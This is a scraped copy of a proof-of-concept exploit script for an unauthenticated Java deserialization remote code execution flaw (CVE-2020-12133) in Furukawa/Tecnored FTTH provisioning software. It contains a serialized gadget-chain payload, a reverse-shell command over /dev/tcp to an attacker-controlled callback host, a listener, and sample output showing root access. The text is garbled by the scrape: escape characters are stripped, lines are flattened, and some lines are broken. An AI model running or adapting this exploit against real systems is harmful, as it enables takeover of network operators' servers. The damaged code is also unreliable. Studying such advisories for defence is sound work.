Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution ↭
iSpeech
[*]#!/usr/bin/env python3[*]# -*- coding: utf-8 -*-[*]#[*]#[*]# Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution[*]#[*]#[*]# Vendor: Furukawa Electric Co., Ltd. | Tecnored SA[*]# Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar[*]# Affected version: APROS Evolution | 2.8.1[*]# FURUKAWA | 2.7.10[*]# ConsciusMAP | 2.6.4[*]# | 2.3.1[*]# | 2.1.49[*]# | 2.1.36[*]# | 2.1.31[*]# | 2.1.18[*]# | 2.1.16[*]# | 2.1.15[*]# | 2.1.1[*]# | 2.0.1174[*]# | 1.8[*]# | 1.4.70[*]#[*]# Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored[*]# provisioning system for FTTH networks. Complete administration of[*]# your entire external FTTH network plant, including from the ONUs[*]# installed in each end customer, to the wiring and junction boxes.[*]# Unify all the management of your FTTH network on a single platform.[*]# Unify all your data, whether from customers, your network, or the[*]# external plant in one place. APROS FTTH allows you to manage your[*]# entire FTTH network in a simple and globalized way with just one[*]# click, without being a network expert. Includes services such as:[*]# bandwidth limitation, Turbo Internet for time plans, BURST Internet,[*]# QinQ for companies, and many more. General consumption graphics and[*]# per customer in real time. Captive Portal for cutting or suspension[*]# of the service.[*]#[*]# Desc: The FTTH provisioning solution suffers from an unauthenticated[*]# remote code execution vulnerability due to an unsafe deserialization[*]# of Java objects (ViewState) triggered via the 'javax.faces.ViewState'[*]# HTTP POST parameter. The deserialization can cause the vulnerable JSF[*]# web application to execute arbitrary Java functions, malicious Java[*]# bytecode, and system shell commands with root privileges.[*]#[*]# ===================================================================[*]# $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444[*]# [*] Setting up valid URL path[*]# [*] Starting callback listener child thread[*]# [*] Starting handler on port 4444[*]# [*] Sending serialized object[*]# [*] Connection from 172.16.0.1:48446[*]# [*] You got shell![*]# tomcat7@zslab:/var/lib/tomcat7$ id[*]# uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa)[*]# tomcat7@zslab:/var/lib/tomcat7$ sudo su[*]# id[*]# uid=0(root) gid=0(root) grupos=0(root)[*]# exit[*]# tomcat7@zslab:/var/lib/tomcat7$ exit[*]# *** Connection closed by remote host ***[*]# ===================================================================[*]#[*]# Tested on: Apache Tomcat/7.0.68[*]# Apache Tomcat/7.0.52[*]# Apache MyFaces/2.2.1[*]# Apache MyFaces/2.1.17[*]# Apache MyFaces/2.0.10[*]# GNU/Linux 4.4.0-173[*]# GNU/Linux 4.4.0-137[*]# GNU/Linux 4.4.0-101[*]# GNU/Linux 4.4.0-83[*]# GNU/Linux 3.15.0[*]# GNU/Linux 3.13.0-32[*]# PrimeFaces/4.0.RC1[*]# Apache-Coyote/1.1[*]# ACC Library 3.1[*]# Ubuntu 16.04.2[*]# Ubuntu 14.04.2[*]# Java/1.8.0_242[*]# Java/1.8.0_181[*]# Java/1.8.0_131[*]# Java/1.7.0_79[*]# MySQL 5.7.29[*]# MySQL 5.7.18[*]#[*]#[*]# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic[*]# Macedonian Information Security Research and Development Laboratory[*]# Zero Science Lab - https://www.zeroscience.mk - @zeroscience[*]#[*]#[*]# Advisory ID: ZSL-2020-5565[*]# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php[*]#[*]# CVE ID: CVE-2020-12133[*]# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133[*]#[*]#[*]# 24.02.2020[*]#
import os#############[*]import sys############[*]import gzip#######o###[*]import zlib###########[*]import socket#########[*]import base64#########[*]import urllib#########[*]import requests#######[*]import telnetlib######[*]import threading######[*]import subprocess#####
from io import BytesIO[*]from time import sleep[*]from flash import blic
class Optics:
def __init__(self):[*]self.callback = None#[*]self.headers = None##[*]self.payload = None##[*]self.target = None###[*]self.lport = None####[*]self.path = None#####[*]self.cmd = None######
def allears(self):[*]telnetus = telnetlib.Telnet()[*]print("[*] Starting handler on port {}".format(self.lport))[*]s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)[*]s.bind(("0.0.0.0", self.lport))[*]while True:[*]try:[*]s.settimeout(8)[*]s.listen(1)[*]conn, addr = s.accept()[*]print("[*] Connection from {}:{}".format(addr[0], addr[1]))[*]telnetus.sock = conn[*]except socket.timeout as p:[*]print("[!] Probably not vulnerable... ({poraka})".format(poraka=p))[*]print("[+] Check your port mappings.")[*]s.close()[*]exit(0)[*]break
print("[*] You got shell!")
#[*]# UnicodeDecodeError dirty fix:[*]# /usr/lib/python3.6/telnetlib.py[*]# Change from 'ascii' to 'utf-8' (Lines: 553 and 556)[*]#
telnetus.interact()[*]conn.close()
def thricer(self):[*]print("[*] Starting callback listener child thread")[*]konac = threading.Thread(name="ZSL", target=self.allears)[*]konac.start()[*]sleep(1)[*]self.gadget()
def gadget(self):[*]self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/"[*]self.cmd += self.callback[*]self.cmd += "/"[*]self.cmd += str(self.lport)[*]self.cmd += "< &1"
payload = b"xACxEDx00x05x73x72x00x11x6Ax61x76x61x2Ex75x74x69x6C"[*]payload += b"x2Ex48x61x73x68x53x65x74xBAx44x85x95x96xB8xB7x34x03"[*]payload += b"x00x00x78x70x77x0Cx00x00x00x02x3Fx40x00x00x00x00x00"[*]payload += b"x01x73x72x00x34x6Fx72x67x2Ex61x70x61x63x68x65x2Ex63"[*]payload += b"x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6Cx65x63x74x69x6Fx6E"[*]payload += b"x73x2Ex6Bx65x79x76x61x6Cx75x65x2Ex54x69x65x64x4Dx61"[*]payload += b"x70x45x6Ex74x72x79x8AxADxD2x9Bx39xC1x1FxDBx02x00x02"[*]payload += b"x4Cx00x03x6Bx65x79x74x00x12x4Cx6Ax61x76x61x2Fx6Cx61"[*]payload += b"x6Ex67x2Fx4Fx62x6Ax65x63x74x3Bx4Cx00x03x6Dx61x70x74"[*]payload += b"x00x0Fx4Cx6Ax61x76x61x2Fx75x74x69x6Cx2Fx4Dx61x70x3B"[*]payload += b"x78x70x74x00x26x68x74x74x70x73x3Ax2Fx2Fx67x69x74x68"[*]payload += b"x75x62x2Ex63x6Fx6Dx2Fx6Ax6Fx61x6Fx6Dx61x74x6Fx73x66"[*]payload += b"x2Fx6Ax65x78x62x6Fx73x73x20x73x72x00x2Ax6Fx72x67x2E"[*]payload += b"x61x70x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6F"[*]payload += b"x6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex6Dx61x70x2Ex4Cx61x7A"[*]payload += b"x79x4Dx61x70x6ExE5x94x82x9Ex79x10x94x03x00x01x4Cx00"[*]payload += b"x07x66x61x63x74x6Fx72x79x74x00x2Cx4Cx6Fx72x67x2Fx61"[*]payload += b"x70x61x63x68x65x2Fx63x6Fx6Dx6Dx6Fx6Ex73x2Fx63x6Fx6C"[*]payload += b"x6Cx65x63x74x69x6Fx6Ex73x2Fx54x72x61x6Ex73x66x6Fx72"[*]payload += b"x6Dx65x72x3Bx78x70x73x72x00x3Ax6Fx72x67x2Ex61x70x61"[*]payload += b"x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6Cx65"[*]payload += b"x63x74x69x6Fx6Ex73x2Ex66x75x6Ex63x74x6Fx72x73x2Ex43"[*]payload += b"x68x61x69x6Ex65x64x54x72x61x6Ex73x66x6Fx72x6Dx65x72"[*]payload += b"x30xC7x97xECx28x7Ax97x04x02x00x01x5Bx00x0Dx69x54x72"[*]payload += b"x61x6Ex73x66x6Fx72x6Dx65x72x73x74x00x2Dx5Bx4Cx6Fx72"[*]payload += b"x67x2Fx61x70x61x63x68x65x2Fx63x6Fx6Dx6Dx6Fx6Ex73x2F"[*]payload += b"x63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Fx54x72x61x6Ex73"[*]payload += b"x66x6Fx72x6Dx65x72x3Bx78x70x75x72x00x2Dx5Bx4Cx6Fx72"[*]payload += b"x67x2Ex61x70x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2E"[*]payload += b"x63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex54x72x61x6Ex73"[*]payload += b"x66x6Fx72x6Dx65x72x3BxBDx56x2AxF1xD8x34x18x99x02x00"[*]payload += b"x00x78x70x00x00x00x05x73x72x00x3Bx6Fx72x67x2Ex61x70"[*]payload += b"x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6C"[*]payload += b"x65x63x74x69x6Fx6Ex73x2Ex66x75x6Ex63x74x6Fx72x73x2E"[*]payload += b"x43x6Fx6Ex73x74x61x6Ex74x54x72x61x6Ex73x66x6Fx72x6D"[*]payload += b"x65x72x58x76x90x11x41x02xB1x94x02x00x01x4Cx00x09x69"[*]payload += b"x43x6Fx6Ex73x74x61x6Ex74x71x00x7Ex00x03x78x70x76x72"[*]payload += b"x00x11x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex52x75x6Ex74x69"[*]payload += b"x6Dx65x00x00x00x00x00x00x00x00x00x00x00x78x70x73x72"[*]payload += b"x00x3Ax6Fx72x67x2Ex61x70x61x63x68x65x2Ex63x6Fx6Dx6D"[*]payload += b"x6Fx6Ex73x2Ex63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex66"[*]payload += b"x75x6Ex63x74x6Fx72x73x2Ex49x6Ex76x6Fx6Bx65x72x54x72"[*]payload += b"x61x6Ex73x66x6Fx72x6Dx65x72x87xE8xFFx6Bx7Bx7CxCEx38"[*]payload += b"x02x00x03x5Bx00x05x69x41x72x67x73x74x00x13x5Bx4Cx6A"[*]payload += b"x61x76x61x2Fx6Cx61x6Ex67x2Fx4Fx62x6Ax65x63x74x3Bx4C"[*]payload += b"x00x0Bx69x4Dx65x74x68x6Fx64x4Ex61x6Dx65x74x00x12x4C"[*]payload += b"x6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx53x74x72x69x6Ex67x3B"[*]payload += b"x5Bx00x0Bx69x50x61x72x61x6Dx54x79x70x65x73x74x00x12"[*]payload += b"x5Bx4Cx6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx43x6Cx61x73x73"[*]payload += b"x3Bx78x70x75x72x00x13x5Bx4Cx6Ax61x76x61x2Ex6Cx61x6E"[*]payload += b"x67x2Ex4Fx62x6Ax65x63x74x3Bx90xCEx58x9Fx10x73x29x6C"[*]payload += b"x02x00x00x78x70x00x00x00x02x74x00x0Ax67x65x74x52x75"[*]payload += b"x6Ex74x69x6Dx65x75x72x00x12x5Bx4Cx6Ax61x76x61x2Ex6C"[*]payload += b"x61x6Ex67x2Ex43x6Cx61x73x73x3BxABx16xD7xAExCBxCDx5A"[*]payload += b"x99x02x00x00x78x70x00x00x00x00x74x00x09x67x65x74x4D"[*]payload += b"x65x74x68x6Fx64x75x71x00x7Ex00x1Bx00x00x00x02x76x72"[*]payload += b"x00x10x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex53x74x72x69x6E"[*]payload += b"x67xA0xF0xA4x38x7Ax3BxB3x42x02x00x00x78x70x76x71x00"[*]payload += b"x7Ex00x1Bx73x71x00x7Ex00x13x75x71x00x7Ex00x18x00x00"[*]payload += b"x00x02x70x75x71x00x7Ex00x18x00x00x00x00x74x00x06x69"[*]payload += b"x6Ex76x6Fx6Bx65x75x71x00x7Ex00x1Bx00x00x00x02x76x72"[*]payload += b"x00x10x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex4Fx62x6Ax65x63"[*]payload += b"x74x00x00x00x00x00x00x00x00x00x00x00x78x70x76x71x00"[*]payload += b"x7Ex00x18x73x71x00x7Ex00x13x75x72x00x13x5Bx4Cx6Ax61"[*]payload += b"x76x61x2Ex6Cx61x6Ex67x2Ex53x74x72x69x6Ex67x3BxADxD2"[*]payload += b"x56xE7xE9x1Dx7Bx47x02x00x00x78x70x00x00x00x01x74x00"[*]payload += (bytes(chr(len(self.cmd)), "utf-8"))##################################"[*]payload += (bytes(self.cmd, "utf-8"))############################################"[*]payload += b"x74x00x04x65x78x65x63x75x71x00x7Ex00x1Bx00x00x00x01"[*]payload += b"x71x00x7Ex00x20x73x71x00x7Ex00x0Fx73x72x00x11x6Ax61"[*]payload += b"x76x61x2Ex6Cx61x6Ex67x2Ex49x6Ex74x65x67x65x72x12xE2"[*]payload += b"xA0xA4xF7x81x87x38x02x00x01x49x00x05x76x61x6Cx75x65"[*]payload += b"x78x72x00x10x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex4Ex75x6D"[*]payload += b"x62x65x72x86xACx95x1Dx0Bx94xE0x8Bx02x00x00x78x70x00"[*]payload += b"x00x00x01x73x72x00x11x6Ax61x76x61x2Ex75x74x69x6Cx2E"[*]payload += b"x48x61x73x68x4Dx61x70x05x07xDAxC1xC3x16x60xD1x03x00"[*]payload += b"x02x46x00x0Ax6Cx6Fx61x64x46x61x63x74x6Fx72x49x00x09"[*]payload += b"x74x68x72x65x73x68x6Fx6Cx64x78x70x3Fx40x00x00x00x00"[*]payload += b"x00x00x77x08x00x00x00x10x00x00x00x00x78x78x78"#######"
jbits = BytesIO()[*]with gzip.GzipFile(fileobj=jbits, mode="wb") as f:[*]f.write(payload)[*]serialize = base64.b64encode(jbits.getvalue())[*]print("[*] Sending serialized object")
self.headers = {[*]"Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn",[*]"Content-Type" : "application/x-www-form-urlencoded",[*]"User-Agent" : "ISP-Eye/2.51",[*]"Connection" : "keep-alive"}
self.paramz={"javax.faces.ViewState" : serialize}[*]#sleep(1)[*]r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz)
def par(self):[*]if len(sys.argv) != 4:[*]self.usage()[*]else: [*]self.target = sys.argv[1][*]self.callback = sys.argv[2][*]self.lport = int(sys.argv[3])[*]if not "http" in self.target:[*]self.target = "http://{}".format(self.target)
def check(self):[*]print("[*] Setting up valid URL path")[*]try:[*]r = requests.get(self.target)[*]app = r.text[*]if not "FURUKAWA" in app and not "APROS" in app:[*]print("[!] App not detected.")[*]exit(0)[*]if "FURUKAWA" in app:[*]self.path = "/FURUKAWA/"[*]elif "APROS" in app:[*]self.path = "/APROS/"[*]else:[*]exit(-1337)[*]except Exception as p:[*]print("[!] Somethingz wrong: n--n{poraka}".format(poraka=p))[*]exit(0)
def framed(self):[*]naslov = """[*]o===--------------------------------------===o[*]| |[*]| Furukawa Electric / Tecnored |[*]| APROS Evolution | FURUKAWA | ConsciusMAP |[*]| Fiber-To-The-Home (FTTH) |[*]| |[*]| Java Deserialization Remote Code Execution |[*]| ZSL-2020-5565 |[*]| |[*]o===--------------------------------------===o[*]||[*]||[*](__/)||[*](•ㅅ•)||[*]/ づ|[*]"""[*]print(naslov)
def usage(self):[*]self.framed()[*]print("Usage: ./furukawa.py
def main(self):[*]self.par()########()[*]self.check()######()[*]self.thricer()####()
if __name__ == '__main__':[*]Optics().main()[*]
Gloss